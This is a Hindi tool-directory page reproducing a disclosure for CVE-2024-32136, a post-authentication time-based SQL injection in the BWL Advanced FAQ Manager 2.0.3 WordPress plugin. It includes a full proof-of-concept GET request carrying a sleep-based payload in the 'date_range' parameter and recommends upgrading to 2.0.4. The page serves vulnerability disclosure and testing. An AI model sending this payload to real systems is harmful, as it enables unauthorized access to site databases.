Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32136 | Kitploit
उपकरण/GitHubGitHub/xbz0n/cve-2024-32136
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubxbz0n/cve-2024-32136

CVE-2024-32136

रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

BWL Advanced FAQ Manager 2.0.3 - प्रमाणीकरण-पश्चात SQL इंजेक्शन

शोषण शीर्षक: BWL Advanced FAQ Manager 2.0.3 - प्रमाणीकरण-पश्चात SQL इंजेक्शन
दिनांक: 14 Apr 2024
शोषण लेखक: Ivan Spiridonov (xbz0n)
सॉफ़्टवेयर लिंक: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
संस्करण: 2.0.3
परीक्षण किया गया: Ubuntu 20.04
CVE: CVE-2024-32136

SQL इंजेक्शन

SQL इंजेक्शन एक प्रकार की सुरक्षा भेद्यता है जो किसी हमलावर को एप्लिकेशन के डेटाबेस क्वेरीज़ में हस्तक्षेप करने की अनुमति देती है। इसमें आमतौर पर क्लाइंट से एप्लिकेशन में इनपुट डेटा के माध्यम से SQL क्वेरी का सम्मिलन या "इंजेक्शन" शामिल होता है। एक सफल SQL इंजेक्शन शोषण डेटाबेस से संवेदनशील डेटा पढ़ सकता है, डेटाबेस डेटा को संशोधित कर सकता है (इन्सर्ट/अपडेट/डिलीट), डेटाबेस पर प्रशासनिक ऑपरेशन निष्पादित कर सकता है (जैसे DBMS को बंद करना), DBMS फाइल सिस्टम पर मौजूद किसी दिए गए फ़ाइल की सामग्री पुनर्प्राप्त कर सकता है, और कुछ मामलों में, ऑपरेटिंग सिस्टम को कमांड जारी कर सकता है।

प्रभावित घटक

  • प्लगइन: BWL Advanced FAQ Manager
  • संस्करण: 2.0.3
  • प्रभावित पैरामीटर: 'date_range'
  • प्रभावित पृष्ठ: /wp-admin/edit.php

विवरण

यह भेद्यता BWL Advanced FAQ Manager प्लगइन के 'bwl-advanced-faq-analytics' पृष्ठ में उपयोग किए जाने वाले 'date_range' पैरामीटर के भीतर मौजूद है। प्रमाणित हमलावर इस पैरामीटर के इनपुट में हेरफेर करके डेटाबेस के भीतर मनमाने SQL कमांड निष्पादित कर सकते हैं।

प्रूफ ऑफ कॉन्सेप्ट

मैन्युअल शोषण

निम्नलिखित GET अनुरोध भेद्यता को प्रदर्शित करता है:

root@kitploit:~
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [Relevant Cookies]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

यदि सर्वर प्रतिक्रिया लगभग 20 सेकंड तक विलंबित होती है, तो यह समय-आधारित SQL इंजेक्शन के सफल शोषण का संकेत देता है, जो भेद्यता की पुष्टि करता है।

अनुशंसाएँ

BWL Advanced FAQ Manager v2.0.3 उपयोगकर्ताओं को सलाह दी जाती है कि वे प्लगइन को फिक्स्ड संस्करण v2.0.4 में अपडेट करें।

टूल डाउनलोड करें